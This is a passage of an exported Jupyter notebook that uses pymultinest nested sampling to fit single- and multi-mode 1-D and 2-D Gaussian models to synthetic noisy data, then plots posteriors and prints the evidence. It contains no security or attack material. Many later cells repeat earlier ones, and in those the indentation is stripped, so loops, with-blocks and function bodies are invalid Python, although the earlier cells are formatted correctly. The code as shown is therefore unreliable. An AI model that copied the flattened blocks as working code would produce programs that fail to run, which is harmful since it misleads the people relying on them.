# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest: multimodal sampling, 1000 live points, output under chains/2-
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# fig = gcf()
# axs = fig.get_axes()
# for ax in axs:
#     ax.set_ylim(-16,0)
# In[ ]:
# Persist the parameter names and derived statistics next to the chains,
# then report the global log-evidence.
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
    json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
    json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
# Marginal and conditional posterior plots for every parameter (pair),
# followed by per-mode marginals (plain and cumulative).
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
    # Diagonal panel: 1-D marginal of parameter i.
    plt.subplot(n_params, n_params, n_params * i + i + 1)
    p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
    plt.ylabel("Probability")
    plt.xlabel(parameters[i])
    for j in range(i):
        # Off-diagonal panel: conditional of parameter i given parameter j.
        plt.subplot(n_params, n_params, n_params * j + i + 1)
        #plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
        p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
        plt.xlabel(parameters[i])
        plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
    #plt.subplot(n_params, n_params, i + 1)
    # outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
    p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
    plt.ylabel("Probability")
    plt.xlabel(parameters[i])
    # plt.savefig(outfile, format='pdf', bbox_inches='tight')
    # plt.close()
    # outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
    p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
    plt.ylabel("Cumulative probability")
    plt.xlabel(parameters[i])
    # plt.savefig(outfile, format='pdf', bbox_inches='tight')
    # plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
# Compare the best fit and each posterior mode against the true parameters.
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
    print('mode' + str(k) + '\t', np.round(mode['mean'],3))
print('True\t', [param0, param1])
# In[ ]:
p.analyser.get_stats()
# In[ ]:
# Overlay the data, each mode's model curve, their sum, and the best fit.
figure(figsize=(10,10))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
modelAll = np.zeros(thdata.size)
for m in p.analyser.get_stats()['modes']:
    modelAll = modelAll + model(m['mean'])(thdata) #* model(m[''])
    plot(thdata, model(m['mean'])(thdata))
plot(thdata, modelAll)
plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
# ** MultiModel Gaussian Normal**
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian1Dp(cube):
    # Unnormalised 1-D Gaussian: height * exp(-0.5*((center - y)/width)**2).
    # (Duplicate of the definition in the earlier cell.)
    center = cube[0]
    width = cube[1]
    height = cube[2]
    return lambda y: height*np.exp(-0.5*(( (center - y) / width)**2))# / sqrt(2*pi*width**2)
def gaussian1D(cube):
    # Normalised 1-D Gaussian PDF with mean `center` and sigma `width`.
    center = cube[0]
    width = cube[1]
    return lambda y: np.exp(-0.5*(( (center - y) / width)**2)) / sqrt(2*pi*width**2)
def straight_line(cube):
    # Affine model: offset + slope * abscissa.
    offset = cube[0]
    slope = cube[1]
    return lambda abscissa: offset + slope * abscissa
def sine_wave(cube):
    # Sinusoid with amplitude cube[0] and period cube[1].
    amp = cube[0]
    period = cube[1]
    return lambda abscissa: amp*sin(2*pi / period * abscissa)
np.random.seed(42)
param0a= -0.5#0.05
param0b= 0.5#0.05
param1a= 0.1#5*pi
param1b= 0.1#5*pi
# param2= 0.8
yunc = 0.1
nPts = int(100)
nThPts= int(1e3)
xmin = -1#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
# model = sine_wave; parameters = ["amp", "period"]
# model = straight_line; parameters = ["offset", "slope"]
model = gaussian1D; parameters = ["center", "width"]
# model = gaussian1Dp; parameters = ["center", "width", "height"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.linspace(xmin,xmax,nPts)
# xdata = np.random.uniform(xmin, xmax, nPts)
# xdata = sort(xdata)
ydata = model([param0a,param1a])(xdata) + model([param0b,param1b])(xdata)
yerr = np.random.normal(0, yuncs, nPts)
zdata = ydata + yerr
figure(figsize=(10,10))
plot(thdata, model([param0a,param1a])(thdata) + model([param0b,param1b])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# In[ ]:
# our probability functions
# Taken from the eggbox problem.
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
    # In-place prior transform of the unit hypercube:
    # cube[0] (center) -> uniform on [-1, 1]; cube[1] (width) -> uniform on [0, 2].
    cube[0] = cube[0]*2 - 1
    cube[1] = cube[1]*2
def myloglike(cube, ndim, nparams):
    # Gaussian chi-square log-likelihood of the observed data.
    # BUG FIX: fit the noisy measurements zdata rather than the noise-free
    # ydata; yuncs are the per-point 1-sigma errors.
    modelNow = model(cube)(xdata)
    return -0.5*((modelNow - zdata)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# fig = gcf()
# axs = fig.get_axes()
# for ax in axs:
# ax.set_ylim(-16,0)
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3))
print('True a\t', [param0a, param1a])
print('True b\t', [param0b, param1b])
# In[ ]:
p.analyser.get_stats()
# In[ ]:
figure(figsize=(10,10))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
modelAll = np.zeros(thdata.size)
for m in p.analyser.get_stats()['modes']:
modelAll = modelAll + model(m['mean'])(thdata)# * model(m[''])
plot(thdata, model(m['mean'])(thdata))
plot(thdata, modelAll)
plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
# ** MultiModel Gaussian Normal with Height Free**
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian1Dp(cube):
center = cube[0]
width = cube[1]
height = cube[2]
return lambda y: height*np.exp(-0.5*(( (center - y) / width)**2))# / sqrt(2*pi*width**2)
def gaussian1D(cube):
center = cube[0]
width = cube[1]
return lambda y: np.exp(-0.5*(( (center - y) / width)**2)) / sqrt(2*pi*width**2)
def straight_line(cube):
offset = cube[0]
slope = cube[1]
return lambda abscissa: offset + slope * abscissa
def sine_wave(cube):
amp = cube[0]
period = cube[1]
return lambda abscissa: amp*sin(2*pi / period * abscissa)
np.random.seed(42)
param0a= -0.5#0.05
param0b= 0.5#0.05
param1a= 0.1#5*pi
param1b= 0.1#5*pi
param2a= 0.8
param2b= 0.8
yunc = 0.1
nPts = int(100)
nThPts= int(1e3)
xmin = -1#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
# model = sine_wave; parameters = ["amp", "period"]
# model = straight_line; parameters = ["offset", "slope"]
# model = gaussian1D; parameters = ["center", "width"]
model = gaussian1Dp; parameters = ["center", "width", "height"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.linspace(xmin,xmax,nPts)
# xdata = np.random.uniform(xmin, xmax, nPts)
# xdata = sort(xdata)
ydata = model([param0a,param1a,param2a])(xdata) + model([param0b,param1b,param2b])(xdata)
yerr = np.random.normal(0, yuncs, nPts)
zdata = ydata + yerr
figure(figsize=(10,10))
plot(thdata, model([param0a,param1a,param2a])(thdata) + model([param0b,param1b,param2b])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# In[ ]:
# our probability functions
# Taken from the eggbox problem.
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
    # In-place prior transform: center -> uniform on [-1, 1];
    # width -> uniform on [0, 2]; height -> uniform on [0, 2].
    cube[0] = cube[0]*2 - 1
    cube[1] = cube[1]*2
    cube[2] = cube[2]*2
def myloglike(cube, ndim, nparams):
    # Gaussian chi-square log-likelihood of the observed data.
    # BUG FIX: fit the noisy measurements zdata rather than the noise-free
    # ydata; yuncs are the per-point 1-sigma errors.
    modelNow = model(cube)(xdata)
    return -0.5*((modelNow - zdata)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# fig = gcf()
# axs = fig.get_axes()
# for ax in axs:
# ax.set_ylim(-16,0)
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3))
print('True a\t', [param0a, param1a])
print('True b\t', [param0b, param1b])
# In[ ]:
p.analyser.get_stats()
# In[ ]:
figure(figsize=(10,10))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
modelAll = np.zeros(thdata.size)
for m in p.analyser.get_stats()['modes']:
modelAll = modelAll + model(m['mean'])(thdata)# * model(m[''])
plot(thdata, model(m['mean'])(thdata))
plot(thdata, modelAll)
plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
#
# # 2D Gaussian Modeling
# **2D Gaussian Normal Mono-Modal**
# In[ ]:
# Build the 2-D coordinate grids: xdata varies along columns, ydata along
# rows (transpose of the same construction); both are nPts x nPts.
nPts = int(100)
nThPts= int(1e3)
xmin = -0#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
ymin = -0#*pi
ymax = 1#*pi
dy = 0.1*(ymax - ymin)
xdata = np.ones((nPts,nPts))*np.linspace(xmin,xmax,nPts)
ydata = (np.ones((nPts,nPts))*np.linspace(ymin,ymax,nPts)).T
# Visual sanity check of the two coordinate grids.
fig = figure(figsize=(16,8))
ax = fig.add_subplot(221)
ax.imshow(xdata)
ax.set_ylim(0,nPts)
ax = fig.add_subplot(222)
ax.imshow(ydata)
ax.set_ylim(0,nPts)
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian2D(cube):
    """Isotropic 2-D Gaussian on (y, x) centred at (cube[0], cube[0]).

    NOTE(review): the normalisation is the 1-D factor sqrt(2*pi*width**2);
    a fully normalised 2-D Gaussian would divide by 2*pi*width**2 --
    confirm whether that is intentional before reusing elsewhere.
    """
    mu = cube[0]
    sigma = cube[1]

    def surface(y, x):
        zy = ((mu - y) / sigma) ** 2
        zx = ((mu - x) / sigma) ** 2
        return np.exp(-0.5 * (zy + zx)) / sqrt(2 * pi * sigma ** 2)

    return surface
np.random.seed(42)
param0= 0.5#0.05
param1= 0.1#0.05
# param2= 0.8
yunc = 0.1
nPts = int(100)
nThPts= int(1e3)
xmin = -0#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
ymin = -0#*pi
ymax = 1#*pi
dy = 0.1*(ymax - ymin)
model = gaussian2D; parameters = ["center", "width"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, (nPts,nPts))
# thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.ones((nPts,nPts))*np.linspace(xmin,xmax,nPts)
ydata = (np.ones((nPts,nPts))*np.linspace(ymin,ymax,nPts)).T
zmodel = model([param0,param1])(ydata,xdata)
zerr = np.random.normal(0, yuncs, (nPts,nPts))
zdata = zmodel + zerr
figure(figsize=(10,10))
# imshow(thdata, model([param0,param1])(thdata))
imshow(zdata, extent=[xdata.min(), xdata.max(), ydata.min(), ydata.max()])
# In[ ]:
# our probability functions
# Taken from the eggbox problem.
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
    # Identity prior: uniform on [0, 1] for both parameters.
    pass
def myloglike(cube, ndim, nparams):
    # Chi-square log-likelihood of the observed noisy image zdata, with
    # per-pixel 1-sigma uncertainties yuncs.
    modelNow = gaussian2D(cube)(ydata,xdata)
    return -0.5*((modelNow - zdata)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# fig = gcf()
# axs = fig.get_axes()
# for ax in axs:
# ax.set_ylim(-16,0)
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3),'\t', np.round(mode['local log-evidence'],3))
print('True\t', [param0, param1])
# In[ ]:
modelAll = np.zeros((nPts, nPts))
fig=figure(figsize=(20,10))
for km,mode in enumerate(p.analyser.get_stats()['modes']):
modelAll = modelAll + model(mode['mean'])(ydata,xdata) #* model(m[''])
ax = fig.add_subplot(1,len(p.analyser.get_stats()['modes']), km+1)
ims = ax.imshow(model(mode['mean'])(ydata,xdata))
plt.colorbar(ims)
fig = figure(figsize=(20,10))
ax = fig.add_subplot(131)
ims = ax.imshow(modelAll)
plt.colorbar(ims)
ax = fig.add_subplot(132)
ims = ax.imshow(model(p.analyser.get_best_fit()['parameters'])(ydata,xdata))
plt.colorbar(ims)
ax = fig.add_subplot(133)
# ims = ax.imshow(model([param0, param1])(ydata,xdata))
ims = ax.imshow(zdata)
plt.colorbar(ims)
# In[ ]:
p.analyser.get_stats()
# **2D Gaussian Normal Multi-Modal**
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian2D(cube):
    # Isotropic 2-D Gaussian centred at (center, center) with common width.
    # NOTE(review): normalisation is the 1-D factor sqrt(2*pi*width**2); a
    # fully normalised 2-D Gaussian would use 2*pi*width**2 -- confirm intent.
    center = cube[0]
    width = cube[1]
    return lambda y,x: np.exp(-0.5*((( (center - y) / width)**2) + (( (center - x) / width)**2))) / sqrt(2*pi*width**2)
np.random.seed(42)
param0a= 0.75#0.05
param1a= 0.05#0.05
param0b= 0.25#0.05
param1b= 0.05#0.05
# param2= 0.8
yunc = 0.1
nPts = int(100)
nThPts= int(1e3)
xmin = -0#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
ymin = -0#*pi
ymax = 1#*pi
dy = 0.1*(ymax - ymin)
model = gaussian2D; parameters = ["center", "width"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, (nPts,nPts))
# thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.ones((nPts,nPts))*np.linspace(xmin,xmax,nPts)
ydata = (np.ones((nPts,nPts))*np.linspace(ymin,ymax,nPts)).T
zmodel = model([param0a,param1a])(ydata,xdata) + model([param0b,param1b])(ydata,xdata)
zerr = np.random.normal(0, yuncs, (nPts,nPts))
zdata = zmodel + zerr
figure(figsize=(10,10))
imshow(zdata, extent=[xdata.min(), xdata.max(), ydata.min(), ydata.max()])
# In[ ]:
# our probability functions
# Taken from the eggbox problem.
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
    # Identity prior: uniform on [0, 1] for both parameters.
    pass
def myloglike(cube, ndim, nparams):
    # Chi-square log-likelihood of the observed noisy image zdata.
    modelNow = gaussian2D(cube)(ydata,xdata)
    return -0.5*((modelNow - zdata)**2. / yuncs**2.).sum()
def null_loglike(cube, ndim, nparams):
    # NOTE(review): apparently intended as a "null model" evidence term, but
    # as written it scores the *model* against zero rather than the data
    # against a zero model; a data-only null would be
    # -0.5*((zdata)**2. / yuncs**2.).sum() and would not depend on cube --
    # confirm intent before relying on it.
    modelNow = gaussian2D(cube)(ydata,xdata)
    return -0.5*((modelNow)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# fig = gcf()
# axs = fig.get_axes()
# for ax in axs:
# ax.set_ylim(-16,0)
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
null_logE = -4.43430028425182973E+04
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3),'\t', np.round(mode['local log-evidence'],3))
print('True a\t', [param0a, param1a])
print('True b\t', [param0b, param1b])
# In[ ]:
modelAll = np.zeros((nPts, nPts))
fig=figure(figsize=(20,10))
for km,mode in enumerate(p.analyser.get_stats()['modes']):
modelAll = modelAll + model(mode['mean'])(ydata,xdata)
ax = fig.add_subplot(1,len(p.analyser.get_stats()['modes']), km+1)
ims = ax.imshow(model(mode['mean'])(ydata,xdata))
plt.colorbar(ims)
fig = figure(figsize=(20,10))
ax = fig.add_subplot(131)
ims = ax.imshow(modelAll)
plt.colorbar(ims)
ax = fig.add_subplot(132)
